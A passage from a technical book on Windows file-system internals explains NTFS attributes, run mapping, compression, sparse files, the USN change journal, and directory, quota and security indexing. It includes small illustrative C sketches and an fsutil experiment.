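/* A name (and its creation time) leaves the directory: cache it. */
static void tunnel_on_remove(const char *name, time_t create_time, time_t now)
{
    for (int i = 0; i < TUNNEL_SLOTS; i++)
        if (!cache[i].used) {
            strncpy(cache[i].name, name, sizeof(cache[i].name) - 1);
            cache[i].name[sizeof(cache[i].name) - 1] = '\0';
            cache[i].create_time = create_time;
            cache[i].removed_at  = now;
            cache[i].used = 1;
            return;
        }
}

/* A name is (re)created: return 1 and the tunneled creation time if the
   same name is cached and still within the timeout window. */
static int tunnel_on_create(const char *name, time_t now, time_t *create_time)
{
    for (int i = 0; i < TUNNEL_SLOTS; i++)
        if (cache[i].used && strcmp(cache[i].name, name) == 0 &&
            now - cache[i].removed_at <= TUNNEL_AGE) {
            *create_time = cache[i].create_time;
            cache[i].used = 0;
            return 1;
        }
    return 0;
}
```

This is why step 7 of the experiment shows identical creation times: the rename in step 6 removes the name file1 and immediately re-creates it, so the cached creation time is restored.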
Resident and nonresident attributes
If a file is small, all its attributes and their values (its data, for example) fit within the file record that
describes the file. When the value of an attribute is stored in the MFT (either in the file’s main file record
or an extension record located elsewhere within the MFT), the attribute is called a resident attribute.
(In Figure 11-37, for example, all attributes are resident.) Several attributes are defined as always being
resident so that NTFS can locate nonresident attributes. The standard information and index root at-
tributes are always resident, for example.
Each attribute begins with a standard header containing information about the attribute—informa-
tion that NTFS uses to manage the attributes in a generic way. The header, which is always resident,
records whether the attribute’s value is resident or nonresident. For resident attributes, the header also
contains the offset from the header to the attribute’s value and the length of the attribute’s value, as
Figure 11-37 illustrates for the file name attribute.
When an attribute’s value is stored directly in the MFT, the time it takes NTFS to access the value
is greatly reduced. Instead of looking up a file in a table and then reading a succession of allocation
units to find the file’s data (as the FAT file system does, for example), NTFS accesses the disk once and
retrieves the data immediately.
FIGURE 11-37 Resident attribute header and value. [The record holds standard information, file name, and data attributes. The file name attribute's header is marked "RESIDENT" with Offset: 8h and Length: 18h; its value is the name MYFILE.DAT.]
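The lookup that the resident-attribute header enables can be sketched as a tiny parser. This is an illustrative model only: the field names, sizes, and offsets below are invented for the sketch and do not match the real on-disk NTFS attribute record header:

```c
#include <stdint.h>
#include <string.h>

/* Illustrative model of the header in Figure 11-37. The layout is
   invented for this sketch; the real on-disk attribute record header
   has more fields and different offsets. */
struct attr_header {
    uint32_t type_code;     /* numeric attribute type code */
    uint8_t  nonresident;   /* 0 = the value follows inside the record */
    uint16_t value_offset;  /* offset of the value from the header */
    uint32_t value_length;  /* length of the value in bytes */
};

/* Return a pointer to a resident attribute's value inside the record,
   or NULL when the attribute is nonresident (its header would contain
   run mappings instead of the value). */
static const uint8_t *attr_value(const uint8_t *record, uint32_t *length)
{
    struct attr_header h;
    memcpy(&h, record, sizeof(h));   /* copy avoids alignment issues */
    if (h.nonresident)
        return NULL;
    *length = h.value_length;
    return record + h.value_offset;
}
```

The point of the sketch is the single indirection: once the header is read, the value is reached with one offset, with no further table lookups.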
The attributes for a small directory, as well as for a small file, can be resident in the MFT, as Figure 11-38
shows. For a small directory, the index root attribute contains an index (organized as a B-tree) of file
record numbers for the files (and the subdirectories) within the directory.
FIGURE 11-38 MFT file record for a small directory. [The record holds standard information, file name, and index root attributes; the index root contains the index of files (file1, file2, file3, ...), and the rest of the record is empty.]
Of course, many files and directories can't be squeezed into a 1 KB or 4 KB fixed-size MFT record. If a
particular attribute’s value, such as a file’s data attribute, is too large to be contained in an MFT file record,
NTFS allocates clusters for the attribute’s value outside the MFT. A contiguous group of clusters is called
a run (or an extent). If the attribute’s value later grows (if a user appends data to the file, for example),
NTFS allocates another run for the additional data. Attributes whose values are stored in runs (rather than
within the MFT) are called nonresident attributes. The file system decides whether a particular attribute is
resident or nonresident; the location of the data is transparent to the process accessing it.
When an attribute is nonresident, as the data attribute for a large file will certainly be, its header
contains the information NTFS needs to locate the attribute’s value on the disk. Figure 11-39 shows a
nonresident data attribute stored in two runs.
FIGURE 11-39 MFT file record for a large file with two data runs. [The record holds standard information, file name, and NTFS extended attributes; the nonresident data attribute points to two data runs outside the record.]
Among the standard attributes, only those that can grow can be nonresident. For files, the attributes
that can grow are the data and the attribute list (not shown in Figure 11-39). The standard information
and file name attributes are always resident.
A large directory can also have nonresident attributes (or parts of attributes), as Figure 11-40 shows.
In this example, the MFT file record doesn’t have enough room to store the B-tree that contains the
index of files that are within this large directory. A part of the index is stored in the index root attribute,
and the rest of the index is stored in nonresident runs called index allocations. The index root, index
allocation, and bitmap attributes are shown here in a simplified form. They are described in more detail
in the next section. The standard information and file name attributes are always resident. The header
and at least part of the value of the index root attribute are also resident for directories.
FIGURE 11-40 MFT file record for a large directory with a nonresident file name index. [The record holds standard information, file name, index root, index allocation, and bitmap attributes. The index root contains part of the index of files (file4, file8); nonresident index buffers hold the rest (file1, file2, file3 and file5, file6).]
When an attribute’s value can’t fit in an MFT file record and separate allocations are needed, NTFS
keeps track of the runs by means of VCN-to-LCN mapping pairs. LCNs represent the sequence of
clusters on an entire volume from 0 through n. VCNs number the clusters belonging to a particular file
from 0 through m. For example, the clusters in the runs of a nonresident data attribute are numbered
as shown in Figure 11-41.
FIGURE 11-41 VCNs for a nonresident data attribute. [File 16's record holds standard information and file name attributes plus a nonresident data attribute stored in two runs: VCNs 0-3 map to LCNs 1355-1358, and VCNs 4-7 map to LCNs 1588-1591.]
If this file had more than two runs, the numbering of the third run would start with VCN 8. As
Figure 11-42 shows, the data attribute header contains VCN-to-LCN mappings for the two runs here,
which allows NTFS to easily find the allocations on the disk.
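The mapping structure in Figure 11-42 is straightforward to model: each run stores a starting VCN, a starting LCN, and a cluster count, and translating a VCN is a scan of the run list. A minimal sketch, using the run values from Figure 11-42:

```c
/* One run (extent): a contiguous group of clusters. */
struct run {
    long long start_vcn;
    long long start_lcn;
    long long clusters;
};

/* Translate a VCN to an LCN by scanning the run list; returns -1 if
   the VCN falls outside every run. */
static long long vcn_to_lcn(const struct run *runs, int n, long long vcn)
{
    for (int i = 0; i < n; i++)
        if (vcn >= runs[i].start_vcn &&
            vcn <  runs[i].start_vcn + runs[i].clusters)
            return runs[i].start_lcn + (vcn - runs[i].start_vcn);
    return -1;
}
```

With the runs {0, 1355, 4} and {4, 1588, 4}, VCN 6 translates to LCN 1590.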
FIGURE 11-42 VCN-to-LCN mappings for a nonresident data attribute. [The same two runs as Figure 11-41; the data attribute header records the mapping pairs: starting VCN 0, starting LCN 1355, 4 clusters; starting VCN 4, starting LCN 1588, 4 clusters.]
Although Figure 11-41 shows just data runs, other attributes can be stored in runs if there isn’t
enough room in the MFT file record to contain them. And if a particular file has too many attributes
to fit in the MFT record, a second MFT record is used to contain the additional attributes (or attribute
headers for nonresident attributes). In this case, an attribute called the attribute list is added. The at-
tribute list attribute contains the name and type code of each of the file’s attributes and the file number
of the MFT record where the attribute is located. The attribute list attribute is provided for those cases
where all of a file’s attributes will not fit within the file’s file record or when a file grows so large or so
fragmented that a single MFT record can’t contain the multitude of VCN-to-LCN mappings needed to
find all its runs. Files with more than 200 runs typically require an attribute list. In summary, attribute
headers are always contained within file records in the MFT, but an attribute’s value may be located
outside the MFT in one or more extents.
Data compression and sparse files
NTFS supports compression on a per-file, per-directory, or per-volume basis using a variant of the LZ77
algorithm, known as LZNT1. (NTFS compression is performed only on user data, not file system meta-
data.) In Windows 8.1 and later, files can also be compressed using a newer suite of algorithms, which
include LZX (most compact) and XPRESS (using 4, 8, or 16K block sizes, in order of speed). This type of
compression, which can be used through commands such as the compact shell command (as well as
File Provider APIs), leverages the Windows Overlay Filter (WOF) file system filter driver (Wof.sys),
which uses an NTFS alternate data stream and sparse files, and is not part of the NTFS driver per se.
WOF is outside the scope of this book, but you can read more about it here:
https://devblogs.microsoft.com/oldnewthing/20190618-00/p102597.
You can tell whether a volume is compressed by using the Windows GetVolumeInformation function. To
retrieve the actual compressed size of a file, use the Windows GetCompressedFileSize function. Finally,
to examine or change the compression setting for a file or directory, use the Windows DeviceIoControl
function. (See the FSCTL_GET_COMPRESSION and FSCTL_SET_COMPRESSION file system control
codes.) Keep in mind that although setting a file’s compression state compresses (or decompresses) the
file right away, setting a directory’s or volume’s compression state doesn’t cause any immediate com-
pression or decompression. Instead, setting a directory’s or volume’s compression state sets a default
compression state that will be given to all newly created files and subdirectories within that directory or
volume (although, if you were to set directory compression using the directory’s property page within
Explorer, the contents of the entire directory tree will be compressed immediately).
The following section introduces NTFS compression by examining the simple case of compress-
ing sparse data. The subsequent sections extend the discussion to the compression of ordinary files
and sparse files.
Note NTFS compression is not supported in DAX volumes or for encrypted files.
Compressing sparse data
Sparse data is often large but contains only a small amount of nonzero data relative to its size. A sparse
matrix is one example of sparse data. As described earlier, NTFS uses VCNs, from 0 through m, to enu-
merate the clusters of a file. Each VCN maps to a corresponding LCN, which identifies the disk location
of the cluster. Figure 11-43 illustrates the runs (disk allocations) of a normal, noncompressed file, includ-
ing its VCNs and the LCNs they map to.
FIGURE 11-43 Runs of a noncompressed file. [Three 4-cluster runs: VCNs 0-3 map to LCNs 1355-1358, VCNs 4-7 to LCNs 1588-1591, and VCNs 8-11 to LCNs 2033-2036.]
This file is stored in three runs, each of which is 4 clusters long, for a total of 12 clusters. Figure 11-44
shows the MFT record for this file. As described earlier, to save space, the MFT record’s data attribute,
which contains VCN-to-LCN mappings, records only one mapping for each run, rather than one for
each cluster. Notice, however, that each VCN from 0 through 11 has a corresponding LCN associated
with it. The first entry starts at VCN 0 and covers 4 clusters, the second entry starts at VCN 4 and covers
4 clusters, and so on. This entry format is typical for a noncompressed file.
FIGURE 11-44 MFT record for a noncompressed file. [The data attribute records three mappings: starting VCN 0, LCN 1355, 4 clusters; starting VCN 4, LCN 1588, 4 clusters; starting VCN 8, LCN 2033, 4 clusters.]
When a user selects a file on an NTFS volume for compression, one NTFS compression technique is
to remove long strings of zeros from the file. If the file’s data is sparse, it typically shrinks to occupy a
fraction of the disk space it would otherwise require. On subsequent writes to the file, NTFS allocates
space only for runs that contain nonzero data.
Figure 11-45 depicts the runs of a compressed file containing sparse data. Notice that certain ranges
of the file’s VCNs (16–31 and 64–127) have no disk allocations.
FIGURE 11-45 Runs of a compressed file containing sparse data. [Four 16-cluster runs: VCNs 0-15 map to LCNs 133-148, VCNs 32-47 to LCNs 193-208, VCNs 48-63 to LCNs 96-111, and VCNs 128-143 to LCNs 324-339. VCNs 16-31 and 64-127 have no disk allocation.]
The MFT record for this compressed file omits blocks of VCNs that contain zeros and therefore have
no physical storage allocated to them. The first data entry in Figure 11-46, for example, starts at VCN 0
and covers 16 clusters. The second entry jumps to VCN 32 and covers 16 clusters.
FIGURE 11-46 MFT record for a compressed file containing sparse data. [The data attribute records four mappings: starting VCN 0, LCN 133, 16 clusters; VCN 32, LCN 193, 16 clusters; VCN 48, LCN 96, 16 clusters; VCN 128, LCN 324, 16 clusters.]
When a program reads data from a compressed file, NTFS checks the MFT record to determine
whether a VCN-to-LCN mapping covers the location being read. If the program is reading from an
unallocated “hole” in the file, it means that the data in that part of the file consists of zeros, so NTFS
returns zeros without further accessing the disk. If a program writes nonzero data to a “hole,” NTFS
quietly allocates disk space and then writes the data. This technique is very efficient for sparse file data
that contains a lot of zero data.
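That read path can be sketched on top of the same kind of run list: a VCN covered by no run is a hole, so the buffer is zero-filled without touching the disk. The extent values used in the test come from Figure 11-46; the function below only records which LCN it would read, since the real disk I/O is out of scope:

```c
#include <string.h>

struct extent {
    long long start_vcn;
    long long start_lcn;
    long long clusters;
};

/* Satisfy a one-cluster read at 'vcn'. A VCN covered by no extent is a
   hole: the buffer is left zero-filled with no disk access, and -1 is
   returned. For an allocated VCN, the LCN that a real implementation
   would read from disk is returned. */
static long long read_vcn(const struct extent *ext, int n, long long vcn,
                          unsigned char *buf, size_t cluster_size)
{
    memset(buf, 0, cluster_size);
    for (int i = 0; i < n; i++)
        if (vcn >= ext[i].start_vcn &&
            vcn <  ext[i].start_vcn + ext[i].clusters)
            return ext[i].start_lcn + (vcn - ext[i].start_vcn);
    return -1;   /* hole: caller gets zeros */
}
```

Reads from VCN 20 or VCN 100 of the Figure 11-46 file return zeros immediately, while VCN 33 resolves to LCN 194 and goes to disk.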
Compressing nonsparse data
The preceding example of compressing a sparse file is somewhat contrived. It describes “compres-
sion” for a case in which whole sections of a file were filled with zeros, but the remaining data in the file
wasn’t affected by the compression. The data in most files isn’t sparse, but it can still be compressed by
the application of a compression algorithm.
In NTFS, users can specify compression for individual files or for all the files in a directory. (New
files created in a directory marked for compression are automatically compressed—existing files
must be compressed individually when programmatically enabling compression with
FSCTL_SET_COMPRESSION.) When it compresses a file, NTFS divides the file's unprocessed data into
compression units 16 clusters long (equal to 128 KB for an 8 KB cluster, for example). Certain sequences of data in a file
might not compress much, if at all; so for each compression unit in the file, NTFS determines whether
compressing the unit will save at least 1 cluster of storage. If compressing the unit won’t free up at least
1 cluster, NTFS allocates a 16-cluster run and writes the data in that unit to disk without compressing
it. If the data in a 16-cluster unit will compress to 15 or fewer clusters, NTFS allocates only the number
of clusters needed to contain the compressed data and then writes it to disk. Figure 11-47 illustrates
the compression of a file with four runs. The unshaded areas in this figure represent the actual storage
locations that the file occupies after compression. The first, second, and fourth runs were compressed;
the third run wasn’t. Even with one noncompressed run, compressing this file saved 26 clusters of disk
space, or 41%.
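The accounting above can be checked with the per-unit rule just described: a unit is stored compressed only if that saves at least one cluster, so the allocation for a unit is its compressed size when that is under 16 clusters, and the full 16 clusters otherwise. A small sketch:

```c
#define UNIT_CLUSTERS 16

/* Clusters allocated for one compression unit, given the size the unit
   would occupy after compression: the compressed size only if that
   saves at least one cluster, otherwise the full raw unit. */
static int unit_allocation(int compressed_clusters)
{
    if (compressed_clusters < UNIT_CLUSTERS)
        return compressed_clusters;   /* store compressed */
    return UNIT_CLUSTERS;             /* store raw; compression saves nothing */
}
```

For the four units of Figure 11-47, which compress to 4, 8, 16 (incompressible), and 10 clusters, this allocates 38 of 64 clusters, a saving of 26 clusters, about 41%.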
FIGURE 11-47 Data runs of a compressed file. [Four runs: VCNs 0-15 compressed into LCNs 19-22 (4 clusters); VCNs 16-31 compressed into LCNs 23-30 (8 clusters); VCNs 32-47 stored noncompressed in LCNs 97-112 (16 clusters); VCNs 48-63 compressed into LCNs 113-122 (10 clusters).]
Note Although the diagrams in this chapter show contiguous LCNs, a compression unit
need not be stored in physically contiguous clusters. Runs that occupy noncontiguous clus-
ters produce slightly more complicated MFT records than the one shown in Figure 11-47.
When it writes data to a compressed file, NTFS ensures that each run begins on a virtual 16-cluster
boundary. Thus the starting VCN of each run is a multiple of 16, and the runs are no longer than 16 clus-
ters. NTFS reads and writes at least one compression unit at a time when it accesses compressed files.
When it writes compressed data, however, NTFS tries to store compression units in physically contigu-
ous locations so that it can read them all in a single I/O operation. The 16-cluster size of the NTFS com-
pression unit was chosen to reduce internal fragmentation: the larger the compression unit, the less the
overall disk space needed to store the data. This 16-cluster compression unit size represents a trade-off
between producing smaller compressed files and slowing read operations for programs that randomly
access files. The equivalent of 16 clusters must be decompressed for each cache miss. (A cache miss is
more likely to occur during random file access.) Figure 11-48 shows the MFT record for the compressed
file shown in Figure 11-47.
FIGURE 11-48 MFT record for a compressed file. [The data attribute records four mappings: starting VCN 0, LCN 19, 4 clusters; VCN 16, LCN 23, 8 clusters; VCN 32, LCN 97, 16 clusters; VCN 48, LCN 113, 10 clusters.]
One difference between this compressed file and the earlier example of a compressed file contain-
ing sparse data is that three of the compressed runs in this file are less than 16 clusters long. Reading
this information from a file’s MFT file record enables NTFS to know whether data in the file is com-
pressed. Any run shorter than 16 clusters contains compressed data that NTFS must decompress when
it first reads the data into the cache. A run that is exactly 16 clusters long doesn’t contain compressed
data and therefore requires no decompression.
If the data in a run has been compressed, NTFS decompresses the data into a scratch buffer and
then copies it to the caller’s buffer. NTFS also loads the decompressed data into the cache, which makes
subsequent reads from the same run as fast as any other cached read. NTFS writes any updates to the
file to the cache, leaving the lazy writer to compress and write the modified data to disk asynchro-
nously. This strategy ensures that writing to a compressed file produces no more significant delay than
writing to a noncompressed file would.
NTFS keeps disk allocations for a compressed file contiguous whenever possible. As the LCNs indi-
cate, the first two runs of the compressed file shown in Figure 11-47 are physically contiguous, as are
the last two. When two or more runs are contiguous, NTFS performs disk read-ahead, as it does with
the data in other files. Because the reading and decompression of contiguous file data take place asyn-
chronously before the program requests the data, subsequent read operations obtain the data directly
from the cache, which greatly enhances read performance.
Sparse files
Sparse files (the NTFS file type, as opposed to files that consist of sparse data, as described earlier) are
essentially compressed files for which NTFS doesn’t apply compression to the file’s nonsparse data.
However, NTFS manages the run data of a sparse file’s MFT record the same way it does for compressed
files that consist of sparse and nonsparse data.
The change journal file
The change journal file, \$Extend\$UsnJrnl, is a sparse file in which NTFS stores records of changes to
files and directories. Applications like the Windows File Replication Service (FRS) and the Windows
Search service make use of the journal to respond to file and directory changes as they occur.
The journal stores change entries in the $J data stream and the maximum size of the journal in the $Max
data stream. Entries are versioned and include the following information about a file or directory change:
- The time of the change
- The reason for the change (see Table 11-9)
- The file or directory's attributes
- The file or directory's name
- The file or directory's MFT file record number
- The file record number of the file's parent directory
- The security ID
- The update sequence number (USN) of the record
- Additional information about the source of the change (a user, the FRS, and so on)
TABLE 11-9 Change journal change reasons

Identifier                               Reason
USN_REASON_DATA_OVERWRITE                The data in the file or directory was overwritten.
USN_REASON_DATA_EXTEND                   Data was added to the file or directory.
USN_REASON_DATA_TRUNCATION               The data in the file or directory was truncated.
USN_REASON_NAMED_DATA_OVERWRITE          The data in a file's data stream was overwritten.
USN_REASON_NAMED_DATA_EXTEND             The data in a file's data stream was extended.
USN_REASON_NAMED_DATA_TRUNCATION         The data in a file's data stream was truncated.
USN_REASON_FILE_CREATE                   A new file or directory was created.
USN_REASON_FILE_DELETE                   A file or directory was deleted.
USN_REASON_EA_CHANGE                     The extended attributes for a file or directory changed.
USN_REASON_SECURITY_CHANGE               The security descriptor for a file or directory was changed.
USN_REASON_RENAME_OLD_NAME               A file or directory was renamed; this is the old name.
USN_REASON_RENAME_NEW_NAME               A file or directory was renamed; this is the new name.
USN_REASON_INDEXABLE_CHANGE              The indexing state for the file or directory was changed (whether or not the Indexing service will process this file or directory).
USN_REASON_BASIC_INFO_CHANGE             The file or directory attributes and/or the time stamps were changed.
USN_REASON_HARD_LINK_CHANGE              A hard link was added or removed from the file or directory.
USN_REASON_COMPRESSION_CHANGE            The compression state for the file or directory was changed.
USN_REASON_ENCRYPTION_CHANGE             The encryption state (EFS) was enabled or disabled for this file or directory.
USN_REASON_OBJECT_ID_CHANGE              The object ID for this file or directory was changed.
USN_REASON_REPARSE_POINT_CHANGE          The reparse point for a file or directory was changed, or a new reparse point (such as a symbolic link) was added or deleted from a file or directory.
USN_REASON_STREAM_CHANGE                 A new data stream was added to or removed from a file or renamed.
USN_REASON_TRANSACTED_CHANGE             This value is added (ORed) to the change reason to indicate that the change was the result of a recent commit of a TxF transaction.
USN_REASON_CLOSE                         The handle to a file or directory was closed, indicating that this is the final modification made to the file in this series of operations.
USN_REASON_INTEGRITY_CHANGE              The content of a file's extent (run) has changed, so the associated integrity stream has been updated with a new checksum. This identifier is generated by the ReFS file system.
USN_REASON_DESIRED_STORAGE_CLASS_CHANGE  The event is generated by the NTFS file system driver when a stream is moved from the capacity to the performance tier or vice versa.
EXPERIMENT: Reading the change journal
You can use the built-in %SystemRoot%\System32\Fsutil.exe tool to create, delete, or query
journal information, as shown here:
d:\>fsutil usn queryjournal d:
Usn Journal ID   : 0x01d48f4c3853cc72
First Usn        : 0x0000000000000000
Next Usn         : 0x0000000000000a60
Lowest Valid Usn : 0x0000000000000000
Max Usn          : 0x7fffffffffff0000
Maximum Size     : 0x0000000000a00000
Allocation Delta : 0x0000000000200000
Minimum record version supported : 2
Maximum record version supported : 4
Write range tracking: Disabled
The output indicates the maximum size of the change journal on the volume (10 MB) and its
current state. As a simple experiment to see how NTFS records changes in the journal, create a
file called Usn.txt in the current directory, rename it to UsnNew.txt, and then dump the journal
with Fsutil, as shown here:
d:\>echo Hello USN Journal! > Usn.txt
d:\>ren Usn.txt UsnNew.txt
d:\>fsutil usn readjournal d:
...
Usn              : 2656
File name        : Usn.txt
File name length : 14
Reason           : 0x00000100: File create
Time stamp       : 12/8/2018 15:22:05
File attributes  : 0x00000020: Archive
File ID          : 0000000000000000000c000000617912
Parent file ID   : 00000000000000000018000000617ab6
Source info      : 0x00000000: *NONE*
Security ID      : 0
Major version    : 3
Minor version    : 0
Record length    : 96
Usn              : 2736
File name        : Usn.txt
File name length : 14
Reason           : 0x00000102: Data extend | File create
Time stamp       : 12/8/2018 15:22:05
File attributes  : 0x00000020: Archive
File ID          : 0000000000000000000c000000617912
Parent file ID   : 00000000000000000018000000617ab6
Source info      : 0x00000000: *NONE*
Security ID      : 0
Major version    : 3
Minor version    : 0
Record length    : 96
Usn              : 2816
File name        : Usn.txt
File name length : 14
Reason           : 0x80000102: Data extend | File create | Close
Time stamp       : 12/8/2018 15:22:05
File attributes  : 0x00000020: Archive
File ID          : 0000000000000000000c000000617912
Parent file ID   : 00000000000000000018000000617ab6
Source info      : 0x00000000: *NONE*
Security ID      : 0
Major version    : 3
Minor version    : 0
Record length    : 96
Usn              : 2896
File name        : Usn.txt
File name length : 14
Reason           : 0x00001000: Rename: old name
Time stamp       : 12/8/2018 15:22:15
File attributes  : 0x00000020: Archive
File ID          : 0000000000000000000c000000617912
Parent file ID   : 00000000000000000018000000617ab6
Source info      : 0x00000000: *NONE*
Security ID      : 0
Major version    : 3
Minor version    : 0
Record length    : 96
Usn              : 2976
File name        : UsnNew.txt
File name length : 20
Reason           : 0x00002000: Rename: new name
Time stamp       : 12/8/2018 15:22:15
File attributes  : 0x00000020: Archive
File ID          : 0000000000000000000c000000617912
Parent file ID   : 00000000000000000018000000617ab6
Source info      : 0x00000000: *NONE*
Security ID      : 0
Major version    : 3
Minor version    : 0
Record length    : 96
Usn              : 3056
File name        : UsnNew.txt
File name length : 20
Reason           : 0x80002000: Rename: new name | Close
Time stamp       : 12/8/2018 15:22:15
File attributes  : 0x00000020: Archive
File ID          : 0000000000000000000c000000617912
Parent file ID   : 00000000000000000018000000617ab6
Source info      : 0x00000000: *NONE*
Security ID      : 0
Major version    : 3
Minor version    : 0
Record length    : 96
The entries reflect the individual modification operations underlying the command-line
operations. If the change journal isn't enabled on a volume (this happens especially on
non-system volumes where no applications have requested file change notification or USN
Journal creation), you can easily create it with the following command (in the example,
a 10-MB journal has been requested):
d:\>fsutil usn createJournal d: m=10485760 a=2097152
The journal is sparse so that it never overflows; when the journal’s on-disk size exceeds the maxi-
mum defined for the file, NTFS simply begins zeroing the file data that precedes the window of change
information having a size equal to the maximum journal size, as shown in Figure 11-49. To prevent con-
stant resizing when an application is continuously exceeding the journal’s size, NTFS shrinks the journal
only when its size is twice an application-defined value over the maximum configured size.
[Figure: layout of the $J alternate data stream, showing empty (zeroed) space followed by change entries that record the file name, type of change, time of change, file MFT entry number, and so on; the virtual and physical sizes of $UsnJrnl:$J differ because the stream is sparse]
FIGURE 11-49 Change journal ($UsnJrnl) space allocation.
Indexing
In NTFS, a file directory is simply an index of file names—that is, a collection of file names (along with their
file record numbers) organized as a B-tree. To create a directory, NTFS indexes the file name attributes of
the files in the directory. The MFT record for the root directory of a volume is shown in Figure 11-50.
[Figure: the root directory ("\") MFT record with standard information, file name, index root, index allocation, and bitmap attributes; the index root holds the first-level entries (file4, file10, file15), which point through VCN-to-LCN mappings to index buffers containing the remaining file names (file0, file1, file3, file6, file8, file9, and so on)]
FIGURE 11-50 File name index for a volume's root directory.
Conceptually, an MFT entry for a directory contains in its index root attribute a sorted list of the
files in the directory. For large directories, however, the file names are actually stored in 4 KB, fixed-
size index buffers (which are the nonresident values of the index allocation attribute) that contain and
organize the file names. Index buffers implement a B-tree data structure, which minimizes the number
of disk accesses needed to find a particular file, especially for large directories. The index root attribute
contains the first level of the B-tree (root subdirectories) and points to index buffers containing the
next level (more subdirectories, perhaps, or files).
Figure 11-50 shows only file names in the index root attribute and the index buffers (file6, for
example), but each entry in an index also contains the record number in the MFT where the file is
described and time stamp and file size information for the file. NTFS duplicates the time stamps and
file size information from the file’s MFT record. This technique, which is used by FAT and NTFS, requires
updated information to be written in two places. Even so, it’s a significant speed optimization for direc-
tory browsing because it enables the file system to display each file’s time stamps and size without
opening every file in the directory.
The index allocation attribute maps the VCNs of the index buffer runs to the LCNs that indicate
where the index buffers reside on the disk, and the bitmap attribute keeps track of which VCNs in the
index buffers are in use and which are free. Figure 11-50 shows one file entry per VCN (that is, per clus-
ter), but file name entries are actually packed into each cluster. Each 4 KB index buffer will typically con-
tain about 20 to 30 file name entries (depending on the lengths of the file names within the directory).
The B-tree data structure is a type of balanced tree that is ideal for organizing sorted data stored on
a disk because it minimizes the number of disk accesses needed to find an entry. In the MFT, a direc-
tory’s index root attribute contains several file names that act as indexes into the second level of the
B-tree. Each file name in the index root attribute has an optional pointer associated with it that points
to an index buffer. The index buffer it points to contains file names with lexicographic values less than
its own. In Figure 11-50, for example, file4 is a first-level entry in the B-tree. It points to an index buffer
containing file names that are (lexicographically) less than itself—the file names file0, file1, and file3.
Note that the names file1, file3, and so on that are used in this example are not literal file names but
names intended to show the relative placement of files that are lexicographically ordered according to
the displayed sequence.
Storing the file names in B-trees provides several benefits. Directory lookups are fast because the
file names are stored in a sorted order. And when higher-level software enumerates the files in a direc-
tory, NTFS returns already-sorted names. Finally, because B-trees tend to grow wide rather than deep,
NTFS’s fast lookup times don’t degrade as directories grow.
NTFS also provides general support for indexing data besides file names, and several NTFS fea-
tures—including object IDs, quota tracking, and consolidated security—use indexing to manage
internal data.
The B-tree indexes are a generic capability of NTFS and are used for organizing security descriptors,
security IDs, object IDs, disk quota records, and reparse points. Directories are referred to as file name
indexes whereas other types of indexes are known as view indexes.
Object IDs
In addition to storing the object ID assigned to a file or directory in the $OBJECT_ID attribute of its
MFT record, NTFS also keeps the correspondence between object IDs and their file record numbers in
the $O index of the \$Extend\$ObjId metadata file. The index collates entries by object ID (which is a
GUID), making it easy for NTFS to quickly locate a file based on its ID. This feature allows applications,
using the NtCreateFile native API with the FILE_OPEN_BY_FILE_ID flag, to open a file or directory using
its object ID. Figure 11-51 demonstrates the correspondence of the $ObjId metadata file and $OBJECT_ID
attributes in MFT records.
[Figure: the $ObjId metadata file's $O index maps each object ID (the ID passed when an application opens a file using its object ID) to an MFT entry number and a FILE_OBJECTID_BUFFER; the corresponding MFT records carry matching $OBJECT_ID attributes]
FIGURE 11-51 $ObjId and $OBJECT_ID relationships.
Quota tracking
NTFS stores quota information in the \$Extend\$Quota metadata file, which consists of the named
index root attributes $O and $Q. Figure 11-52 shows the organization of these indexes. Just as NTFS
assigns each security descriptor a unique internal security ID, NTFS assigns each user a unique user ID.
When an administrator defines quota information for a user, NTFS allocates a user ID that corresponds
to the user's SID. In the $O index, NTFS creates an entry that maps an SID to a user ID and sorts the
index by SID; in the $Q index, NTFS creates a quota control entry. A quota control entry contains the
value of the user's quota limits, as well as the amount of disk space the user consumes on the volume.
When an application creates a file or directory, NTFS obtains the application user's SID and looks up
the associated user ID in the $O index. NTFS records the user ID in the new file or directory's
$STANDARD_INFORMATION attribute, which counts all disk space allocated to the file or directory
against that user's quota. Then NTFS looks up the quota entry in the $Q index and determines whether
the new allocation causes the user to
exceed his or her warning or limit threshold. When a new allocation causes the user to exceed a
threshold, NTFS takes appropriate steps, such as logging an event to the System event log or not
letting the user create the file or directory. As a file or directory changes size, NTFS updates the quota
control entry associated with the user ID stored in the $STANDARD_INFORMATION attribute. NTFS uses
its generic B-tree indexing to efficiently correlate user IDs with account SIDs and, given a user ID, to
efficiently look up a user's quota control information.
[Figure: the $O index maps SIDs (taken from the application when a file or directory is created) to user IDs; the $Q index maps user IDs (taken from a file's $STANDARD_INFORMATION attribute during a file operation) to per-user quota entries]
FIGURE 11-52 Quota indexing.
Consolidated security
NTFS has always supported security, which lets an administrator specify which users can and can’t access
individual files and directories. NTFS optimizes disk utilization for security descriptors by using a central
metadata file named $Secure to store only one instance of each security descriptor on a volume.
The $Secure file contains two index attributes—$SDH (Security Descriptor Hash) and $SII (Security
ID Index)—and a data-stream attribute named $SDS (Security Descriptor Stream), as Figure 11-53
shows. NTFS assigns every unique security descriptor on a volume an internal NTFS security ID (not to
be confused with a Windows SID, which uniquely identifies computers and user accounts) and hashes
the security descriptor according to a simple hash algorithm. A hash is a potentially nonunique shorthand
representation of a descriptor. Entries in the $SDH index map the security descriptor hashes to
the security descriptor's storage location within the $SDS data attribute, and the $SII index entries map
NTFS security IDs to the security descriptor's location in the $SDS data attribute.
When you apply a security descriptor to a file or directory, NTFS obtains a hash of the descriptor and
looks through the $SDH index for a match. NTFS sorts the $SDH index entries according to the hash of
their corresponding security descriptor and stores the entries in a B-tree. If NTFS finds a match for the
descriptor in the $SDH index, NTFS locates the offset of the entry's security descriptor from the entry's
offset value and reads the security descriptor from the $SDS attribute. If the hashes match but the security
descriptors don't, NTFS looks for another matching entry in the $SDH index. When NTFS finds a precise
match, the file or directory to which you're applying the security descriptor can reference the existing
security descriptor in the $SDS attribute. NTFS makes the reference by reading the NTFS security identifier
from the $SDH entry and storing it in the file or directory's $STANDARD_INFORMATION attribute. The
$STANDARD_INFORMATION attribute, which all files and directories have, stores basic information
about a file, including its attributes, time stamp information, and security identifier.
[Figure: the $SDH index maps security descriptor hashes (computed when a security setting is applied to a file or directory) to offsets in the $SDS data stream, which stores the security descriptors themselves; the $SII index maps NTFS security IDs (taken from a file's $STANDARD_INFORMATION attribute during a security check) to $SDS offsets]
FIGURE 11-53 $Secure indexing.
If NTFS doesn't find in the $SDH index an entry that has a security descriptor that matches the
descriptor you're applying, the descriptor you're applying is unique to the volume, and NTFS assigns the
